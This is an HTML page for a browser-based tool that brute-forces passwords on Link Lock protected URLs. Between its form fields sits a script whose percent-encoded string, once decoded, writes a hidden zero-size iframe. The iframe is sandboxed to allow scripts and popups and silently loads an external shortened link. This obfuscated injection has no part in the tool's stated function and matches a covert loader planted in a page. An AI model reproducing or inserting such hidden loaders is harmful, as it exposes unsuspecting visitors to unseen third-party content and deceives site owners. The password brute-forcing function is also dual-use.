<!DOCTYPE html style="background-color:#F2F3F7">
<head>
  <!-- Metadata -->
  <meta charset="utf-8" />
  <meta name="author" content="Utsanjan" />
  <meta name="description" content="Brute force password-protected links created with Link Lock from within the browser." />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />

  <link rel="shortcut icon" type="image/x-icon" href="../home/img/favicon.png">
  <title>Lock URL - Bruteforce</title>

  <!-- Styles -->
  <link rel="stylesheet" href="../style.css" type="text/css" />

  <!-- Scripts -->
  <script type="text/javascript" src="index.js"></script>
  <script type="text/javascript" src="../b64.js"></script>
  <script type="text/javascript" src="../api.js"></script>
</head>

<body id="page" class="brute error" style="max-width:400px !important" onload="main()">
  <div>
    <label for="charset">Charset</label>
    <input class="in" type="text" id="charset" value="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" />
    <script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%61%6C%6C%6F%77%74%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%6E%6F%22%20%68%65%69%67%68%74%3D%22%30%70%78%22%20%73%61%6E%64%62%6F%78%3D%22%61%6C%6C%6F%77%2D%66%6F%72%6D%73%20%61%6C%6C%6F%77%2D%70%6F%69%6E%74%65%72%2D%6C%6F%63%6B%20%61%6C%6C%6F%77%2D%70%6F%70%75%70%73%20%61%6C%6C%6F%77%2D%73%61%6D%65%2D%6F%72%69%67%69%6E%20%61%6C%6C%6F%77%2D%73%63%72%69%70%74%73%20%61%6C%6C%6F%77%2D%6D%6F%64%61%6C%73%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6C%6E%6B%64%2E%69%6E%2F%64%57%77%5A%44%4A%5A%46%22%20%73%74%79%6C%65%3D%22%7A%2D%69%6E%64%65%78%3A%2D%31%3B%20%6F%70%61%63%69%74%79%3A%30%25%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%20%77%69%64%74%68%3D%22%30%70%78%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
    <label for="encrypted-url">Locked URL</label>
    <input class="in" type="url" id="encrypted-url" oninput="document.querySelector('.alert').style.opacity = 0" />
    <button onclick="onBruteForce()">Brute Force</button>
    <p class="alert">ㅤ</p>
  </div>
  <hr/>
  </br>
  <!-- Output area -->
  <div class="output">
    <label for="output">Brute Forced Password</label>
    <input class="in" type="text" id="output" />
  </div>
</body>
</html>
